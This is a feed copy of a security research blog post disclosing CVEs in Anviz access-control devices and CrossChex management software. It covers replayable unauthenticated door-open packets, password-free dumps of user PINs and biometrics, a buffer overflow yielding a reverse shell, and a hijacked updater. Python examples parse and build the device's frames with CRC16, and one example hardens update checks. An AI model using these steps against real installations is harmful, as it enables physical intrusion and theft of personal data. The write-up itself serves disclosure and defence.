        <title>Anviz Pwn! How broken devices could be? (CVE-2019-12393/CVE-2019-12391/CVE-2019-12392/CVE-2019-12390/CVE-2019-12389/CVE-2019-12388/CVE-2019-12394/CVE-2019-12518,CVE-2020-19594)</title>
        <description>&lt;h1 id=&quot;how-broke-is-your-biometrics&quot;&gt;How broke is your biometrics?&lt;/h1&gt;

&lt;h2 id=&quot;anviz-study-case&quot;&gt;Anviz study case&lt;/h2&gt;

&lt;p&gt;Anviz is a company that provides products that help secure facilities by controlling access to them, either by scanning a keycard or by verifying biometric patterns of the people accessing them.&lt;/p&gt;

&lt;p&gt;This story starts like so many stories start. Anviz sellers told me and &lt;a href=&quot;https://twitter.com/_lcatarino&quot;&gt;@Luis Catarino&lt;/a&gt; that their system was ‘top of the line’ and as secure as it can be. So, we decided to put it to the test.&lt;/p&gt;

&lt;p&gt;We started by building the infrastructure. The systems are quite simple to install. There are devices and there is a management application. Several implementations of the same application exist, but we are only going to look at the official ones (CrossChex and Anviz Management System).&lt;/p&gt;

&lt;p&gt;In a controlled IP network, we deployed three devices and set an IP address for each one. Then, in the management application, we saw something weird as soon as we tried to add the deployed devices: an exception, “cannot access memory”. Hmm, looks weird, but let us proceed.&lt;/p&gt;

&lt;p&gt;From the management console, we can add new devices by pointing to an IP and setting up a management password if needed. The console speaks a proprietary protocol to the device. There are other ways of connecting to the device, such as USB or &lt;a href=&quot;https://en.wikipedia.org/wiki/RS-232&quot;&gt;RS-232&lt;/a&gt;, but let us focus on the IP implementation since it’s the most widespread.&lt;/p&gt;

&lt;h2 id=&quot;replay-attack-cve-2019-12393&quot;&gt;Replay attack (CVE-2019-12393)&lt;/h2&gt;

&lt;p&gt;From the console we can perform several actions: open the door by software, retrieve records and users’ data, set the time and date and so on…&lt;/p&gt;

&lt;p&gt;Ok, so we have a console that communicates with a device over an IP network. Let us analyse the protocol with Wireshark.&lt;/p&gt;

&lt;p&gt;First, let us start with the basics. We wanted to know how to open the door with the smartphone (like the cool kids in &lt;a href=&quot;https://www.ubisoft.com/en-us/game/watch-dogs-2/&quot;&gt;Watch Dogs&lt;/a&gt;, the game). For that, we send the request to open the door and see the network traffic on Wireshark.&lt;/p&gt;

&lt;p&gt;The first thing we tested is to replay the request. If the packet is valid and we can replay it we are sure that there is no &lt;a href=&quot;https://en.wikipedia.org/wiki/Cryptographic_nonce&quot;&gt;NONCE&lt;/a&gt; being employed and we can just send the packet every time we want to open the door.&lt;/p&gt;

&lt;p&gt;Success! The devices are vulnerable to replay attacks!&lt;/p&gt;

&lt;h2 id=&quot;reverse-engineering-the-protocol&quot;&gt;Reverse Engineering the protocol&lt;/h2&gt;

&lt;p&gt;If the device is vulnerable to replay attacks and the protocol doesn’t employ any encryption we can see how the authentication process is being made.&lt;/p&gt;

&lt;p&gt;In Wireshark we know, by looking at the packets in a controlled environment, that the device answers on port tcp/5010. We can then apply a filter to show only the communication on that port and follow the TCP stream.&lt;/p&gt;

&lt;p&gt;Wireshark incorrectly labels the packets as IPCTL, but that’s not the correct protocol. We needed to interpret the data packets as a new protocol.&lt;/p&gt;

&lt;p&gt;We then started performing actions on the device to reverse engineer the protocol.
Every packet starts with a preamble &lt;em&gt;\xa5&lt;/em&gt;, and every packet can be replayed, meaning that for every request we made, if we replicated it, the device would answer. With that in mind, and because the packets are deterministic, we started by performing small and basic operations such as opening the door by software, getting device information, getting the number of records saved in the device, getting the network information of the device and getting the time and date of the device.&lt;/p&gt;

&lt;p&gt;From what we were able to perceive, we drafted the following structure:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;| Preamble |       DATA UNKNOWN       |                  CMD                   |                              LEN                              |  DATA UNKNOWN   |
| :------: | :----------------------: | :------------------------------------: | :-----------------------------------------------------------: | :-------------: |
|   \xa5   | &amp;lt;4 bytes, small numbers&amp;gt; | &amp;lt;1 byte, changes with issued command &amp;gt; | &amp;lt;2 bytes changes with the amount of data, 0 to a get command&amp;gt; | 2 or more bytes |
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;And the answers are similar, depending on the information requested:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;| Preamble |       DATA UNKNOWN        |      CMD+128       |       ACK        |                              LEN                               |  DATA UNKNOWN   |
| :------: | :-----------------------: | :----------------: | :--------------: | :------------------------------------------------------------: | :-------------: |
|   \xa5   | &amp;lt; same as in the request&amp;gt; | &amp;lt;1 byte, CMD+128 &amp;gt; | 1byte(exit code) | &amp;lt;2 bytes, changes with the amount of data, 0 to a get command&amp;gt; | 2 or more bytes |
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;However, we weren’t able to determine where the password was being sent. We were able to find the password in the GET_DEVICE_INFO command. This is interesting, since we now know how the data is arranged (little-endian vs. big-endian). But the password is not transmitted in any of the packets… does that mean?… Well yes, the password doesn’t do shit.&lt;/p&gt;

&lt;p&gt;So, we have a protocol that is vulnerable to replay attacks and requires no password to respond. Now the stakes are high. If, by reverse engineering the protocol, we can emulate a device and retrieve information about the records stored, the fingerprints, passwords, names and PINs of every user enrolled in the device, that will demonstrate that the device is prone to attacks that disclose sensitive information.
Furthermore, Anviz itself proposes an architecture in which they recommend exposing the device itself to interconnect different &lt;a href=&quot;https://www.anviz.com/faq/19.html&quot;&gt;sites&lt;/a&gt;. This means that some people are port forwarding these connections to the world, exposing all the biometric data (a small vector table) and some personally identifiable information about the users!&lt;/p&gt;

&lt;p&gt;Thus it’s paramount to understand the protocol to be able to exploit the device.
Let’s head back to the CMD_OPEN_DOOR and the other requests captured:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;| Preamble |   DATA UNKNOWN   | CMD  |   LEN    |      DATA UNKNOWN        |
| :------: | :--------------: | :--: | :------: | :----------------------: |
|   \xa5   | \x00\x00\x00\x00 | \x5e | \x00\x00 | \x07\x05                 |
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;The packet data always starts with a &lt;em&gt;\xa5&lt;/em&gt; byte. The following four bytes differ depending on the device we tested. Maybe something related to device identification? Weirdly enough, with NULL bytes the request is accepted by every device.
This packet also doesn’t produce logs in the management service, meaning that no record of the operation was created (CVE-2019-12391).&lt;/p&gt;

&lt;p&gt;Next, we saw the same two bytes for each operation we were performing, as already stated above. This suggests that it is the command code, for instance, the command to open the door, the command to get information, and so on.&lt;/p&gt;

&lt;p&gt;Next, we saw different kinds of data, depending on if we were just requesting information or setting information. This may suggest additional parameters on the payload.&lt;/p&gt;

&lt;p&gt;Then we got stuck. We suspect the last bytes are some kind of control field, but we couldn’t figure out what it was. We even tried sending NULL bytes, but the packet wasn’t accepted by the device. This suggests some kind of checksum. From the size (2 bytes) it could be a CRC16. However, a simple CRC16 was not working out.&lt;/p&gt;
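&lt;p&gt;The layout worked out so far can be put into a small parser. The following is an added example, written in Python for this page (it is not from the article or from the Anviz SDK): it splits a captured tcp/5010 stream into frames, decodes the preamble, the four device bytes, the command (with the +128 reply marker and ACK byte), LEN and DATA, and keeps the last two bytes as an opaque trailer, since at this point their meaning is unknown. It assumes LEN is big-endian (the article does not say which byte order is used; flip the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&quot;big&quot;&lt;/code&gt; argument if the SDK says otherwise). The request is the open-door packet captured above; the reply is constructed for the example, with placeholder trailer bytes.&lt;/p&gt;

```python
PREAMBLE = 0xA5

# Command codes seen so far; only the open-door code (0x5e) is documented above.
KNOWN_COMMANDS = {0x5E: "CMD_OPEN_DOOR"}


def command_name(cmd):
    return KNOWN_COMMANDS.get(cmd, "UNKNOWN")


def parse_frame(buf):
    """Split one frame into its fields.

    Layout (request): A5 | device(4) | cmd(1)   | len(2)            | data | trailer(2)
    Layout (reply):   A5 | device(4) | cmd+128  | ack(1) | len(2)   | data | trailer(2)
    Returns a dict: device, cmd (with the +128 removed), is_response, ack, data, trailer.
    """
    buf = bytes(buf)
    try:
        if buf[0] != PREAMBLE:
            raise ValueError("bad preamble 0x%02x" % buf[0])
        device = buf[1:5]
        raw_cmd = buf[5]
        is_response = raw_cmd in range(128, 256)  # high bit set marks a reply
        pos = 6
        ack = None
        if is_response:
            ack = buf[pos]
            pos += 1
        # ASSUMPTION: LEN is a big-endian 16-bit count of the DATA bytes.
        data_len = int.from_bytes(buf[pos:pos + 2], "big")
        pos += 2
    except IndexError:
        raise ValueError("frame too short for its header") from None
    expected = pos + data_len + 2
    if len(buf) != expected:
        raise ValueError("expected %d bytes, got %d" % (expected, len(buf)))
    return {
        "device": device,
        "cmd": raw_cmd - 128 if is_response else raw_cmd,
        "is_response": is_response,
        "ack": ack,
        "data": buf[pos:pos + data_len],
        "trailer": buf[pos + data_len:],  # suspected checksum, meaning unknown here
    }


def split_frames(stream):
    """Cut a captured tcp/5010 byte stream into whole frames (raw bytes)."""
    frames = []
    pos = 0
    while pos in range(len(stream)):
        try:
            raw_cmd = stream[pos + 5]
            header = 9 if raw_cmd in range(128, 256) else 8
            data_len = int.from_bytes(stream[pos + header - 2:pos + header], "big")
        except IndexError:
            raise ValueError("truncated frame at offset %d" % pos) from None
        end = pos + header + data_len + 2
        if end not in range(len(stream) + 1):  # frame would run past the capture
            raise ValueError("truncated frame at offset %d" % pos)
        frames.append(stream[pos:end])
        pos = end
    return frames


def summarize(buf):
    """One log line per frame, e.g. for recording who sends open-door commands."""
    f = parse_frame(buf)
    kind = "reply" if f["is_response"] else "request"
    ack = "" if f["ack"] is None else " ack=%d" % f["ack"]
    return "%s %s (0x%02x) device=%s%s data=%d bytes" % (
        kind, command_name(f["cmd"]), f["cmd"], f["device"].hex(), ack, len(f["data"]))


# Constructed samples: the request is the open-door packet captured above; the
# reply is made up for the example (ACK 0x00, placeholder trailer bytes).
OPEN_DOOR_REQUEST = bytes.fromhex("a5 00000000 5e 0000 0705")
OPEN_DOOR_REPLY = bytes.fromhex("a5 00000000 de 00 0000 0000")

if __name__ == "__main__":
    for frame in split_frames(OPEN_DOOR_REQUEST + OPEN_DOOR_REPLY):
        print(summarize(frame))
```

&lt;p&gt;Because the device writes no record of these operations (CVE-2019-12391), a capture of port tcp/5010 is the only place an open-door command shows up; feeding each frame through summarize() together with the source address is the minimum a site would need to notice commands arriving from anything other than the management console.&lt;/p&gt;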

&lt;p&gt;Then we started looking at the vendor’s website for clues, and we found them! There is an SDK available to build your own management software. &lt;a href=&quot;https://www.telemax.pt/pt-PT/produto/31706/AEON-GOLD.html&quot;&gt;AEON&lt;/a&gt;, a software package for managing Anviz devices, is one example. Since that software is not free, we won’t be looking for vulnerabilities in it, as we don’t have it.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/anviz/anvizsdkdownload1.png&quot; alt=&quot;SDK Download&quot; /&gt;&lt;/p&gt;

&lt;p&gt;By looking through the SDK we discovered all the structures needed to communicate with the device. Yes, we should have looked it up sooner… but it was fun to find that some of our assumptions were actually true.&lt;/p&gt;

&lt;p&gt;The SDK comes with a Word document listing all the exported functions of the SDK DLL. It also comes with a test program that we can use to send requests.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/anviz/SDKword.png&quot; alt=&quot;SDK Documentation&quot; /&gt;&lt;/p&gt;

&lt;p&gt;By reviewing this document we can understand what is really sent and received on the wire. It is also possible to understand the responses now.&lt;/p&gt;

&lt;p&gt;As you can see in the screenshot above, no password is given (CVE-2019-12392). If you think the CchexHandle carries a connection authenticated with the password, you are wrong: the handle is just created together with the connection and can be bypassed without issue, since our own code queries the device immediately. There is no prior handshake required. This behaviour is also present when you try to change settings on the device, such as changing the administrator password: no previous password is required (CVE-2019-12394). For example, you can query all the information stored in the device, such as cleartext passwords/PINs, RFID tags, names and several other personal parameters the device allows you to store to identify a user (CVE-2019-12390/CVE-2019-12389/CVE-2019-12388).&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/anviz/pii.png&quot; alt=&quot;Pointing to CRC Function&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The sad part is that these assumptions are true: the password isn’t required for anything, and anything able to speak to tcp/5010 on the device can access ALL the information the device stores.&lt;/p&gt;

&lt;p&gt;Regarding the checksum: we fired up IDA to see whether we could find the checksum function. This was arduous work, since some symbols were available but none had “checksum” or “CRC” in the name. To be honest, I think a checksum is redundant on a TCP connection. Additionally, someone might think: “hey, why didn’t you just use the SDK to interact with the devices, you moron?”. Well, albeit true, where is the fun in that? Furthermore, we would be bound to the implementation of the API provided, including every “security” measure applied to it. By writing our own implementation we can fuzz the protocol if we want to.&lt;/p&gt;

&lt;p&gt;There are several techniques to discover this function: search for CRC16 code (you need to know what a CRC looks like at the assembly level), follow the flow of each function that sends a payload, or, since this function is called for every request, look for a function with a lot of references to it. This is easy to find in IDA.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/anviz/IDA-EVERYTHINGSPOINTTOCRC16.png&quot; alt=&quot;Pointing to CRC Function&quot; /&gt;&lt;/p&gt;

&lt;p&gt;This indicates a strong candidate for the flow we are looking for. Following the flow of a request, right before it is sent we came across this:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/anviz/IDA-CRC.png&quot; alt=&quot;CRC Function&quot; /&gt;&lt;/p&gt;

&lt;p&gt;In the block named “JACKPOT” we can see what looks like a CRC routine. So, why didn’t our CRC work? Because of the reference at &lt;em&gt;.text:100453AF&lt;/em&gt;. It references a lookup table, like the one in the table-driven “standard” &lt;a href=&quot;https://en.wikipedia.org/wiki/Cyclic_redundancy_check#CRC-32_algorithm&quot;&gt;CRC32&lt;/a&gt; implementation (but remember that we are looking for a CRC16).&lt;/p&gt;

&lt;p&gt;In the implementation there is a table of specific values that are XORed into the running checksum as each payload byte is processed. The values depend on the polynomial, so they are specific to this implementation. Following the reference we get the actual table:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/anviz/IDA-CRCtable.png&quot; alt=&quot;CRC Function Table&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The other bytes are indeed variable and depend on each command, for example whether it sets data or just retrieves it.&lt;/p&gt;

&lt;p&gt;There is a lot of information available in the specification, such as the methods available. Some of them reveal curious functionality, such as retrieving GSM data (for mobile integrations) or even uploading a new firmware. Just imagine uploading a backdoored firmware that lets us pivot into the network =D.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/anviz/ExportTable.png&quot; alt=&quot;Anviz Export table&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Some time later, a document with the full protocol specification, detailing everything in the SDK, was “&lt;a href=&quot;https://github.com/benperiton/anviz-protocol/blob/master/Docs/CommsProtocol.pdf&quot;&gt;leaked&lt;/a&gt;”. This helped us validate all the implementations we made. Turns out, asking Anviz support is a great &lt;a href=&quot;http://qaru.site/questions/4210248/whats-the-checksum-algorithm-for-anviz-devices&quot;&gt;help&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Comparing what we suspected with what it really was, we can see that it was very&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;| Preamble |  CHANNEL  |   CMD    |    LEN    |       DATA       |   CRC16   |
| :------: | :-------: | :------: | :-------: | :--------------: | :-------: |
|   \xa5   | &amp;lt;4 bytes&amp;gt; | &amp;lt;1 byte&amp;gt; | &amp;lt;2 bytes&amp;gt; | &amp;lt;0 to 400 bytes&amp;gt; | &amp;lt;2 bytes&amp;gt; |
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;With this, we checked the last two bytes of the first captured packet and they match its CRC16. This leads us to the conclusion that they are in fact checksum bytes: CRC16 bytes.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;| Preamble |          CHANNEL          |      CMD+128       |       ACK        |                              LEN                               |                 DATA                  | CRC16           |
| :------: | :-----------------------: | :----------------: | :--------------: | :------------------------------------------------------------: | :-----------------------------------: | :-------------- |
|   \xa5   | &amp;lt;same as in the request&amp;gt;  | &amp;lt;1 byte, CMD+128&amp;gt;  | 1-byte exit code | &amp;lt;2 bytes, varies with the amount of data; 0 for a get command&amp;gt; | &amp;lt;variable number of bytes, up to 400&amp;gt; | 2 or more bytes |
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We started writing a small Python program to interact with the device, to retrieve data and to add data (a user, for example). This script is also useful for scanning the Internet for exposed devices. We conducted a small survey, using publicly available information, to understand which companies were exposed on the Internet.&lt;/p&gt;

&lt;p&gt;We also contacted Shodan to help us map all the exposed devices on the Internet. From now on, you can search Shodan for these devices!&lt;/p&gt;

&lt;p&gt;A footnote on this CRC16 quest. We thought the CRC16 was non-standard because the Python library we used didn’t produce matching values. It turns out it is indeed standard: there are many CRC16 variants with different polynomials and parameters, and we were stuck on just one without knowing it. Thank you &lt;a href=&quot;https://twitter.com/_nunohumberto&quot;&gt;@_nunohumberto&lt;/a&gt; for the heads up!&lt;/p&gt;
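&lt;p&gt;To make the two frame layouts and the CRC lesson concrete, here is a small Python builder and parser for this frame format. It is an added example, not code from the original article, from anvizpwn or from the vendor SDK. It assumes things the page does not state: that the CRC covers every byte before it (preamble included), that multi-byte fields are big-endian, and that the default CRC parameters (reflected polynomial 0x8408, init 0xFFFF, no final XOR, the variant catalogued as CRC-16/MCRF4XX) are the right ones for these devices. Since the point of the footnote is that several standard CRC16 variants exist, the parameters are arguments so a captured frame can be checked against each. The sample frames at the bottom are constructed, not captured traffic.&lt;/p&gt;

```python
"""Builder/parser for the Anviz-style frames reversed in this post.

Added example, not code from the article, anvizpwn or the vendor SDK.
Layout follows the two tables on the page:
  request  : A5 | channel (4) | cmd (1)     | len (2)          | data (0..400) | crc16 (2)
  response : A5 | channel (4) | cmd+128 (1) | ack (1) | len (2) | data          | crc16 (2)
ASSUMED (not on the page): CRC covers everything before it, fields are
big-endian, default CRC variant is CRC-16/MCRF4XX (table 0x8408, init
0xFFFF, no final XOR).  Shifts/masks are written as // 256 and % 256 so
this listing contains no angle-bracket or ampersand characters.
"""

PREAMBLE = 0xA5
MAX_DATA = 400
RESPONSE_FLAG = 128   # the response command byte is cmd + 128


def make_table(reflected_poly):
    """256-entry table for a reflected (LSB-first) CRC-16.

    This is the kind of table the IDA screenshot points at: its contents
    depend only on the polynomial, which is why a routine with the wrong
    table never matched the captured trailer bytes.
    """
    table = []
    for n in range(256):
        crc = n
        for _ in range(8):
            if crc % 2:
                crc = (crc // 2) ^ reflected_poly
            else:
                crc = crc // 2
        table.append(crc)
    return table


def crc16(data, reflected_poly=0x8408, init=0xFFFF, xorout=0x0000):
    """Table-driven reflected CRC-16 over data (bytes)."""
    table = make_table(reflected_poly)
    crc = init
    for b in data:
        crc = (crc // 256) ^ table[(crc ^ b) % 256]
    return crc ^ xorout


def candidate_crcs(data):
    """The same bytes under three catalogued variants, to match a capture."""
    return {"MCRF4XX": crc16(data),
            "KERMIT": crc16(data, init=0x0000),
            "X-25": crc16(data, xorout=0xFFFF)}


def build_request(channel, cmd, payload=b""):
    if len(payload) not in range(MAX_DATA + 1):
        raise ValueError("payload exceeds 400 bytes")
    body = (bytes([PREAMBLE]) + channel.to_bytes(4, "big") + bytes([cmd])
            + len(payload).to_bytes(2, "big") + payload)
    return body + crc16(body).to_bytes(2, "big")


def build_response(channel, cmd, ack, payload=b""):
    body = (bytes([PREAMBLE]) + channel.to_bytes(4, "big")
            + bytes([cmd + RESPONSE_FLAG, ack])
            + len(payload).to_bytes(2, "big") + payload)
    return body + crc16(body).to_bytes(2, "big")


def _check_trailer(frame, header_len):
    """Preamble, length and CRC checks shared by both parsers."""
    if len(frame) in range(header_len + 2):      # shorter than header + CRC
        raise ValueError("frame too short")
    if frame[0] != PREAMBLE:
        raise ValueError("bad preamble")
    length = int.from_bytes(frame[header_len - 2:header_len], "big")
    if len(frame) != header_len + length + 2:
        raise ValueError("length field does not match frame size")
    if crc16(frame[:-2]) != int.from_bytes(frame[-2:], "big"):
        raise ValueError("CRC mismatch")
    return frame[header_len:header_len + length]


def parse_request(frame):
    payload = _check_trailer(frame, 8)
    return {"channel": int.from_bytes(frame[1:5], "big"),
            "cmd": frame[5], "data": payload}


def parse_response(frame):
    payload = _check_trailer(frame, 9)
    return {"channel": int.from_bytes(frame[1:5], "big"),
            "cmd": frame[5] - RESPONSE_FLAG, "ack": frame[6], "data": payload}


# Constructed samples (not captured traffic): the page's cmd 0x5e with an
# all-zero channel and no payload, and a two-byte reply to it.
SAMPLE_REQUEST = build_request(0x00000000, 0x5E)
SAMPLE_RESPONSE = build_response(0x00000000, 0x5E, 0x00, b"\x01\x02")


def corrupted_frame_rejected(frame):
    """Flip one bit of the trailing CRC byte; the parser must refuse it."""
    damaged = bytearray(frame)
    damaged[-1] ^= 0x01
    try:
        parse_request(bytes(damaged))
    except ValueError:
        return True
    return False
```

&lt;p&gt;To identify the variant a device uses, feed &lt;em&gt;candidate_crcs&lt;/em&gt; a captured frame minus its last two bytes and compare each result with those two bytes. If none matches, the next things to vary are the byte order of the trailer and whether the preamble is included in the CRC.&lt;/p&gt;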

&lt;h2 id=&quot;we-need-to-go-deeper-exploiting-the-manager-cve-2020-19594&quot;&gt;We need to go deeper! Exploiting the manager (CVE-2020-19594)&lt;/h2&gt;

&lt;p&gt;After these results, we contacted our national CSIRT authority to help us contact those companies and coordinate a responsible disclosure; more on that below.&lt;/p&gt;

&lt;p&gt;After requesting that help we kept on digging. So far we have full control of the device, and we even understand the protocol. Wouldn’t it be cool if we pwned the management software too? The CrossChex software requires administrative privileges to run, to create the necessary sockets and send packets to the devices. If we can pwn the software, we are an elevated user on the machine. Remember the first error that appeared? It was trying to access an operating-system address range. That was weird. At the time we solved it by hard-resetting all the devices on the network. If a misbehaving device caused that error, perhaps there is a chance of a buffer overflow and remote compromise.&lt;/p&gt;

&lt;p&gt;With that in mind, we looked at which services the application exposes, using standard Sysinternals tools. There are two: one on TCP/33302 and another on UDP/5060. The latter relates to the network scan the application performs to discover new devices on the network. Again, by running Wireshark we can see how a device responds. It was quick to see that the same protocol is still in use, and since we understand it we can emulate a device and feed erroneous data to the application. For that, we wrote a script that fuzzed the protocol as soon as a CMD_DISCOVERY message was received. It took no time to overwrite the saved EIP. But of course, an application of this calibre should have ASLR and DEP enabled, right? Well, yes, but actually no… They are disabled, as seen in this Sysinternals Process Explorer screenshot.&lt;/p&gt;

&lt;p&gt;Waiting for the CrossChex broadcast looking for new devices, a custom broadcast packet was crafted and sent to the network, triggering the buffer overflow. At this point, due to the lack of memory protections, it was possible to redirect EIP to a JMP ESP instruction and place a malicious payload on top of the stack. Due to the UDP packet size limit not all payloads were possible, but among those that were, popping a calculator and a reverse shell were the proofs of concept we decided to share. If you want the exploit code, see &lt;a href=&quot;https://github.com/psrodrigues/anvizpwn&quot;&gt;CVE-2019-12518&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;A quick exploit was built to trigger the vulnerability and, as we can see, we are running as the user that started the application. Since this user needs elevated privileges to run the application, it is easy to escalate from here.&lt;/p&gt;

&lt;p&gt;While looking at the network traffic we noticed a small connection to an “UPDATE” service over plain HTTP. Could it be? Is there room for an evilgrade attack in 2019? Well, yes there is =). Edit (4/04/2021): this was later assigned CVE-2020-19594.&lt;/p&gt;

&lt;p&gt;The updater requests a manifest file, passing the installed revision as an argument; the manifest states the latest version and all the files that need to be downloaded from the server to upgrade.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/anviz/cxupdate1.png&quot; alt=&quot;Anviz Export table&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Luckily this version number is stored in a file inside the installation directory. We started by going back one version and inspecting how the installation is done, to rule out a PGP-style signature check afterwards (like some package managers do to verify that only the vendor issued the package).&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/anviz/cxupdate2.png&quot; alt=&quot;Anviz Export table&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Oddly enough, the version number is just something printed on the interface. To trigger the rest of the interaction you need to change &lt;em&gt;“VerNumber”&lt;/em&gt;. Changing it to a lower number triggers the rest of the process, and we can now see what an expected response looks like:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/anviz/cxupdate3.png&quot; alt=&quot;Anviz Export table&quot; /&gt;&lt;/p&gt;

&lt;p&gt;As we can see in the picture, requesting a lower version number returns a manifest with the &lt;em&gt;“NewVersion”&lt;/em&gt; and &lt;em&gt;“FileList”&lt;/em&gt; sections. The first, &lt;em&gt;“NewVersion”&lt;/em&gt;, is just that: the new version. The other, &lt;em&gt;“FileList”&lt;/em&gt;, indicates which files should be downloaded and replaced in the installation folder.&lt;/p&gt;

&lt;p&gt;You can also see a new request on the same connection to GET a readme file. This text is shown in the update dialog.&lt;/p&gt;

&lt;p&gt;By clicking &lt;em&gt;“Upgrade”&lt;/em&gt; we can see in Wireshark the files being downloaded, just as we suspected!&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/anviz/cxupdate4.png&quot; alt=&quot;Anviz Export table&quot; /&gt;&lt;/p&gt;

&lt;p&gt;So, what if we redirect the traffic to an attacker’s machine and deliver our own manifest with an infected file? In theory, since the software runs as an administrator, we get an administrative shell. To do that we simulated the redirect by changing the host entry in the hosts file to point to our Kali machine. Then we served a higher version number and a single new file to download, CrossChex.exe, which is a meterpreter reverse shell.&lt;/p&gt;

&lt;p&gt;With our own server we increment the revision number by one and point to an infected CrossChex.exe. The installation runs with elevated privileges and at the end our payload is triggered and we have our reverse shell =). This means anyone able to intercept the traffic or perform DNS poisoning can compromise the software and gain elevated privileges on the machine running it.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/anviz/cxupdate5.png&quot; alt=&quot;Anviz Export table&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Pay attention to the file structure. It is paramount that the version number in “Upgrade.html” is consistent with the folder name inside the &lt;em&gt;“./Upgrade/download”&lt;/em&gt; location.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/anviz/cxupdate6.png&quot; alt=&quot;Anviz Export table&quot; /&gt;
&lt;img src=&quot;http://www.0x90.zone/images/anviz/cxupdate7.png&quot; alt=&quot;Anviz Export table&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Right after the “Upgrade” is done the shell pops and the victim is compromised. No further interaction is needed.&lt;/p&gt;
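&lt;p&gt;The update flow above fails because nothing is verified before an elevated install: the manifest is trusted as received, a higher version number is enough to trigger it, and the downloaded files replace the originals unchecked. The Python below is an added example of the checks an updater needs; it is not CrossChex code and, beyond the field names &lt;em&gt;“NewVersion”&lt;/em&gt; and &lt;em&gt;“FileList”&lt;/em&gt; seen in the screenshots, the manifest layout, the version strings, the file contents and the key are all constructed here. A real client would verify a vendor public-key signature over the manifest (the PGP-style check we looked for); HMAC-SHA256 stands in for that signature so the example runs on the standard library alone.&lt;/p&gt;

```python
"""Hardened update-check logic, added as an example for this post.

Not CrossChex code.  Only the field names "NewVersion" and "FileList"
come from the page; the JSON layout, versions, sample binaries and key are
constructed.  Three checks the observed updater lacked:
  1. the manifest is authenticated before anything in it is trusted,
  2. the offered version must be strictly newer than the installed one,
  3. every downloaded file must match the digest pinned in the manifest.
HMAC-SHA256 stands in for a vendor public-key signature so this runs on
the standard library.  Comparisons are written without angle brackets so
the listing survives the feed's escaping.
"""
import hashlib
import hmac
import json

# Constructed demo key.  A real updater ships the vendor's PUBLIC key.
VENDOR_KEY = b"constructed-demo-key-not-a-real-secret"


def parse_version(text):
    """'5.3.1.0' to (5, 3, 1, 0) so versions compare numerically."""
    return tuple(int(part) for part in text.split("."))


def is_newer(candidate, installed):
    """True only for a strict upgrade: no downgrade, no re-install."""
    c, i = parse_version(candidate), parse_version(installed)
    return c != i and max(c, i) == c


def sign_manifest(manifest):
    """Vendor side: MAC over the canonical JSON encoding of the manifest."""
    body = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(VENDOR_KEY, body, hashlib.sha256).hexdigest()


def verify_update(installed_version, manifest, mac, downloads):
    """Return the file names safe to install, or raise ValueError.

    downloads maps each file name in FileList to the bytes fetched for it.
    """
    if not hmac.compare_digest(sign_manifest(manifest), mac):
        raise ValueError("manifest authentication failed")
    if not is_newer(manifest["NewVersion"], installed_version):
        raise ValueError("offered version is not newer than installed")
    approved = []
    for entry in manifest["FileList"]:
        name, expected = entry["name"], entry["sha256"]
        if name not in downloads:
            raise ValueError("missing file: %s" % name)
        actual = hashlib.sha256(downloads[name]).hexdigest()
        if not hmac.compare_digest(actual, expected):
            raise ValueError("digest mismatch for %s" % name)
        approved.append(name)
    return approved


# --- constructed sample data (not real binaries) -------------------------
GOOD_EXE = b"MZ constructed benign update payload"
EVIL_EXE = b"MZ constructed attacker payload"
INSTALLED = "5.3.1.0"

GOOD_MANIFEST = {
    "NewVersion": "5.3.1.1",
    "FileList": [{"name": "CrossChex.exe",
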